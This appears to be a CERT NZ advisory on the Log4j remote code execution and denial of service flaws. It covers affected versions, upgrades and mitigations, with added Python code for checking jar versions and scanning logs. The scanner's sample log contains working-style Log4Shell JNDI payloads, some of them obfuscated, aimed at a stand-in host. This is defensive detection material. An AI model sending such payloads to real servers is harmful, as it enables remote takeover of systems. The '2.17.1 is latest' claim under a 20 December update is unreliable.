12:00pm, 20 December 2021
TLP Rating:
Log4j RCE 0-day actively exploited
Updated: 12:00pm, 20 December 2021 to provide the latest information on version upgrades, and a new denial of service vulnerability in Log4j.
Updated: 4.10pm, 15 December 2021 to provide the latest information on version upgrades, mitigations and a new denial of service vulnerability in Log4j.
Updated: 3.30pm, 13 December 2021 to provide link to list of related software's vulnerability status.
Updated: 10.30am, 11 December 2021 to provide the latest information on version upgrades to protect from this vulnerability.
The widely used Java logging library Log4j has unauthenticated remote code execution (RCE) and denial of service vulnerabilities that are triggered when a user-controlled string is logged. The RCE could give an attacker full control of the affected server; the second vulnerability allows an attacker to conduct a denial of service attack.
Public reports indicate that this is being actively exploited in the wild and that proof-of-concept code has been published.
What's happening
Systems affected
Systems and services that use the Java logging library, Apache Log4j between versions 2.0 and 2.15.0 (inclusive) are affected by the remote code execution vulnerability.
Those running Apache Log4j between versions 2.0 and 2.16.0 (inclusive) are affected by a denial of service vulnerability.
For more information on the specific configurations see the Apache advisory in the More Information section below.
This includes many applications and services written in Java.
What to look for
How to tell if you're at risk
Apache Log4j versions between version 2.0 and 2.15.0 (inclusive) are vulnerable to the remote code execution vulnerability.
Apache Log4j versions between version 2.0 and 2.16.0 (inclusive) are vulnerable to a denial of service vulnerability.
For more information on the specific configurations see the Apache advisory in the More Information section below.
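The version ranges above are easy to misread when a fleet mixes branches (the Java 7 line numbers differently), so the following is an added example, not CERT NZ's or Apache's code, that encodes this page's affected ranges and applies them to a log4j-core jar by reading the jar's manifest and checking whether the JndiLookup class is still present. The jar it inspects is a constructed stand-in built in memory; the only fact it uses that is not on this page is that 2.12.3 is the Java 7 release carrying the denial of service fix (from Apache's advisory, linked below).

```python
"""Classify Log4j 2 versions and inspect log4j-core jars for the issues on this page.

Added example, not CERT NZ's or Apache's code. build_sample_jar() produces a
constructed stand-in (a manifest plus an empty placeholder entry), not a real
log4j-core artifact.
"""
import io
import re
import zipfile
from typing import Optional

# Removing this class from the jar is the emergency "hot patch" for the RCE.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?")


def parse_version(text: str) -> tuple:
    """Pull (major, minor, patch) out of '2.14.1' or 'log4j-core-2.14.1.jar'."""
    m = VERSION_RE.search(text)
    if not m:
        raise ValueError(f"no version number in {text!r}")
    major, minor, patch = m.groups()
    return int(major), int(minor), int(patch or 0)


def assess_version(version: str) -> dict:
    """Apply this advisory's affected ranges to a single Log4j 2 version string."""
    v = parse_version(version)
    if not (2, 0, 0) <= v < (3, 0, 0):
        # Log4j 1.x (and anything else) is outside the scope of this advisory.
        return {"version": version, "in_scope": False, "rce": False, "dos": False,
                "no_lookups_flag_applies": False, "upgrade_recommended": False}
    if v[:2] == (2, 12):
        # Java 7 branch: 2.12.2 carries the RCE fix (stated on this page);
        # 2.12.3 carries the DoS fix (from Apache's advisory, not this page).
        rce = v < (2, 12, 2)
        dos = v < (2, 12, 3)
    else:
        rce = v < (2, 16, 0)   # RCE: 2.0 .. 2.15.0 inclusive
        dos = v < (2, 17, 0)   # DoS: 2.0 .. 2.16.0 inclusive
    return {
        "version": version,
        "in_scope": True,
        "rce": rce,
        "dos": dos,
        # formatMsgNoLookups only exists from 2.10, and is no longer sufficient anyway.
        "no_lookups_flag_applies": rce and v >= (2, 10, 0),
        "upgrade_recommended": rce or dos,
    }


def manifest_version(jar: zipfile.ZipFile) -> Optional[str]:
    """Read Implementation-Version from META-INF/MANIFEST.MF, if present."""
    try:
        manifest = jar.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        return None
    for line in manifest.splitlines():
        key, sep, value = line.partition(":")
        if sep and key.strip() == "Implementation-Version":
            return value.strip()
    return None


def inspect_jar(data: bytes, filename: str) -> dict:
    """Assess one jar by its manifest version, falling back to the filename."""
    with zipfile.ZipFile(io.BytesIO(data)) as jar:
        version = manifest_version(jar) or filename
        has_jndi_lookup = JNDI_LOOKUP_CLASS in jar.namelist()
    report = assess_version(version)
    report["filename"] = filename
    report["jndi_lookup_present"] = has_jndi_lookup
    # A vulnerable version with JndiLookup.class stripped has the emergency
    # mitigation for the RCE applied; it is still affected by the DoS issue.
    report["rce_hot_patched"] = report["rce"] and not has_jndi_lookup
    return report


def build_sample_jar(version: str, include_jndi_lookup: bool = True) -> bytes:
    """Constructed stand-in for a log4j-core jar, for offline testing only."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF",
                     f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        if include_jndi_lookup:
            jar.writestr(JNDI_LOOKUP_CLASS, b"")   # placeholder, not a real class file
    return buf.getvalue()


if __name__ == "__main__":
    for ver in ("2.9.1", "2.14.1", "2.15.0", "2.16.0", "2.17.1", "2.12.2"):
        print(assess_version(ver))
    print(inspect_jar(build_sample_jar("2.14.1", include_jndi_lookup=False),
                      "log4j-core-2.14.1.jar"))
```

On a real host, feed inspect_jar() the bytes of each log4j-core jar found on disk (including jars nested inside WAR and EAR files, which need to be unpacked first); the filename fallback matters because shaded or repackaged jars do not always carry a manifest version.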
How to tell if you're affected
List of software and its vulnerability status, helpfully provided by NCSC-NL:
Log4j overview of related software
The log files for any services using affected Log4j versions will contain user-controlled strings, so look there, and in the access logs of anything that feeds them (web servers, proxies, load balancers), for JNDI lookup strings such as ${jndi:ldap://...} or ${jndi:rmi://...}. Attackers routinely obfuscate these with nested lookups (for example ${${lower:j}ndi:...}) and URL encoding, so a plain search for "jndi" will miss some attempts; the GitHub detection rules linked below cover many of these variants.
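The following is an added example, not CERT NZ's code or any of the linked rule sets, showing the detection logic a defender would run over access logs: it URL-decodes each line, resolves the nested lookups attackers use to hide the word "jndi" from the inside out, and then reports the JNDI target. The log lines at the bottom are constructed for illustration (203.0.113.0/24 and 198.51.100.0/24 are documentation address ranges).

```python
"""Scan log lines for Log4j JNDI lookup (exploit attempt) strings.

Added example, not CERT NZ code. SAMPLE_LOG below is constructed; the
addresses are from documentation ranges.
"""
import re
from urllib.parse import unquote

# Innermost lookup: a ${...} that contains no further ${ or }.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# What we ultimately want to find once the obfuscation has been peeled away.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([^}]*)\}", re.IGNORECASE)


def _collapse(match: re.Match) -> str:
    """Evaluate one innermost lookup the way the obfuscation tricks rely on.

    Attackers hide "jndi" behind lookups that evaluate to single characters:
    ${lower:J} -> j, ${upper:n} -> N, ${::-j} -> j (empty lookup with default),
    ${env:DOES_NOT_EXIST:-j} -> j (undefined variable with default).
    """
    expr = match.group(1)
    if expr.strip().lower().startswith("jndi:"):
        return match.group(0)               # keep the payload itself intact
    if ":-" in expr:                        # ${anything:-default} -> default
        return expr.split(":-", 1)[1]
    name, _, arg = expr.partition(":")
    if name.strip().lower() == "lower":
        return arg.lower()
    if name.strip().lower() == "upper":
        return arg.upper()
    return match.group(0)                   # unknown lookup: leave untouched


def normalize(line: str, max_rounds: int = 20) -> str:
    """URL-decode once, then resolve nested lookups from the inside out."""
    text = unquote(line)
    for _ in range(max_rounds):             # bounded: hostile input can nest deeply
        resolved = INNER_LOOKUP.sub(_collapse, text)
        if resolved == text:
            return text
        text = resolved
    return text


def find_jndi(line: str) -> list:
    """Return the JNDI targets (e.g. 'ldap://host/path') found in one log line."""
    return [m.group(1).strip() for m in JNDI_LOOKUP.finditer(normalize(line))]


def scan_log(text: str) -> list:
    """Return (line number, JNDI target) for every exploit attempt in a log."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        for target in find_jndi(line):
            hits.append((number, target))
    return hits


# Constructed access-log sample: four exploit attempts using different
# obfuscations, followed by two benign lines (one with a harmless lookup).
SAMPLE_LOG = "\n".join([
    '203.0.113.9 - - [10/Dec/2021:13:02:11 +0000] "GET /login?user=${jndi:ldap://203.0.113.5:1389/a} HTTP/1.1" 200 512 "-" "curl/7.68.0"',
    '203.0.113.9 - - [10/Dec/2021:13:02:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${lower:l}dap://203.0.113.5/x}"',
    '203.0.113.9 - - [10/Dec/2021:13:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.5/y}"',
    '203.0.113.9 - - [10/Dec/2021:13:02:14 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.5%2Fz%7D HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.4 - - [10/Dec/2021:13:02:15 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Dec/2021:13:02:16 +0000] "GET /report?date=${date:yyyy-MM-dd} HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
])

if __name__ == "__main__":
    for number, target in scan_log(SAMPLE_LOG):
        print(f"line {number}: JNDI lookup to {target}")
```

A hit only proves an attempt was made; whether it succeeded depends on the Log4j version and configuration of the service that logged the string, which is why the version check above and outbound LDAP/RMI connections to the reported target should be reviewed together. Double URL encoding and other encodings are deliberately not handled here and are a known gap.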
What to do
Prevention
Upgrade Log4j to the latest version. At the time of writing the latest Log4j version is 2.17.1, which fixes both vulnerabilities.
Note: this upgrade requires Java 8 or later. If you cannot upgrade to Java 8 and are running Java 7, Apache has released Log4j 2.12.2 for that branch. Note that 2.12.2 addresses the remote code execution vulnerability; check the Apache advisory for the current 2.12.x release that also covers the denial of service vulnerability.
Mitigation
Previously it was reported that setting the system property log4j2.formatMsgNoLookups to true would mitigate the vulnerability, but this is no longer the case in all circumstances. This mitigation may still help but is no longer sufficient on its own; upgrading is the only complete fix.
Note: this mitigation does not prevent the denial of service vulnerability and only works for versions 2.10 and above. It may also change the behaviour of your system's logging if it relies on lookups for message formatting.
More information
Apache's Log4j advisory
Tech Solvency incident overview and reference guide
NCSC-NL's list of software and vulnerability status
LunaSec's blog on Log4j
GitHub's potential rules that allow detection of exploit attempts
CVE for Log4j RCE vulnerability (CVE-2021-44228)
CVE for Log4j DoS vulnerability (CVE-2021-45046)
CVE for Log4j 2.16.0 DoS vulnerability (CVE-2021-45105)
Mitigating Log4Shell and Other Log4j-Related Vulnerabilities | CISA
If you require more information or further support, submit a report on our website or contact us on 0800 CERTNZ.
For media enquiries, email our media desk at certmedia@cert.govt.nz or call on 021 854 384